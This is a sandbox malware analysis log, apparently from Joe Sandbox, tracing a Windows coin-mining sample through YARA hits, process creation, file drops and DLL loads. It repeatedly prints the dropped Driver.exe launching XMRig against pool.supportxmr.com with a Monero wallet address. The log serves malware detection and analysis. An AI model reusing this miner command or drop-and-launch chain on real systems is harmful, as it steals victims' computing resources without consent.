                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.4118537501.000000000067C000.00000040.00000400.00020000.00000000.sdmp, Driver.exe.1.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                    Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://xmrig.com/wizard
                    Source: Driver.exe, 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Driver.exe, 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://xmrig.com/wizard%s

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 0.2.kWYLtJ0Cn1.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: Process Memory Space: Driver.exe PID: 7476, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: Process Memory Space: Driver.exe PID: 4336, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: 0_2_00FD86EF0_2_00FD86EF
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeCode function: 0_2_00FD25F20_2_00FD25F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_01217D681_2_01217D68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_012132F01_2_012132F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_01216F381_2_01216F38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_012169E81_2_012169E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_012132E71_2_012132E7
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe 8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476
                    Source: kWYLtJ0Cn1.exe, 00000000.00000002.1675093789.000000000137E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename0 vs kWYLtJ0Cn1.exe
                    Source: kWYLtJ0Cn1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.kWYLtJ0Cn1.exe.ffcbc0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                    Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                    Source: 0.2.kWYLtJ0Cn1.exe.f60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner04 author = ditekSHen, description = Detects coinmining malware
                    Source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: 00000002.00000002.1744696812.0000000140001000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: Process Memory Space: Driver.exe PID: 7476, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: Process Memory Space: Driver.exe PID: 4336, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: classification engineClassification label: mal100.troj.expl.evad.mine.winEXE@29/2@1/3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\SysfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:7572:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:1368:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4520:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
                    Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\2f0d5264-2d07-4e9b-ac40-d81c978b4e1cJump to behavior
                    Source: kWYLtJ0Cn1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: kWYLtJ0Cn1.exeReversingLabs: Detection: 50%
                    Source: Driver.exeString found in binary or memory: r_id; jit_vmcnt=(vmcnt<s_waitcnt_value)?vmcnt:-1; if(vmcnt<s_waitcnt_value) s_waitcnt_value=vmcnt; done=true; } p=jit_emit_instruction(p,last_branch_target,jit_inst,jit_prefetch_vgpr_index,jit_vmcnt,batch_size); if(p-start_p>size_limit) { *(p++)=S_SETPC_B64_S1
                    Source: unknownProcess created: C:\Users\user\Desktop\kWYLtJ0Cn1.exe "C:\Users\user\Desktop\kWYLtJ0Cn1.exe"
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7476 -s 764
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7632 -s 864
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6272 -s 864
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe "C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7476 -s 764Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7632 -s 864Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6272 -s 864Jump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kWYLtJ0Cn1.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
